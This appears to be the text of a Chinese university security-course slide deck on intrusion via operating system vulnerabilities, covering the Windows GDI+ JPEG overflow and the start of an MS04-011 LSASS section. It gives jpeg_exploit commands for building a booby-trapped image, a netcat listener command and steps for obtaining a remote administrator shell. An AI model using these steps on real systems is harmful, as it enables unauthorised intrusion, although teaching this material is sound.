实例基于操作系统漏洞的入侵 计算机系统安全课件典型实例.pptVIP

* * 基于操作系统漏洞的入侵 曹天杰 tjcao@cumt.edu.cn 中国矿业大学计算机科学与技术学院 Windows GDI+JPG漏洞（交互类） 受影响版本xp+sp1，2003 Windows图形设备接口(GDI+)是为用户提供在屏幕和打印机上显示信息的API GDI+（Gdiplus.dll）在处理畸形JPEG文件存在缓冲区溢出 检测 使用gdiscan_gui.exe对本地系统检测 使用X-scan检查远程主机是否为受影响系统 工具jpeg_exploit 用法 jpeg_exploit -r your_ip | -b [-p port] jpeg_filename r表示反弹连接攻击，b表示绑定端口攻击 绑定端口 打开命令窗口，输入jpeg_exploit -b -p 1542 myjpg.jpg 传送myjpg.jpg给远程机器，远程机器打开图片 Nc等待连接 使用nc在本地打开端口等待连接nc -l -p 8888（l表示监听模式，p设置本地端口） 溢出 远程机器打开图片，溢出后将主动连接8888端口，溢出成功将获得管理员权限的shell Windows Lsasrv.dll RPC [ms04011]缓冲区移出漏洞 受影响版本xp+sp1，2000 检测漏洞 使用DSSan 检测操作系统1 使用getos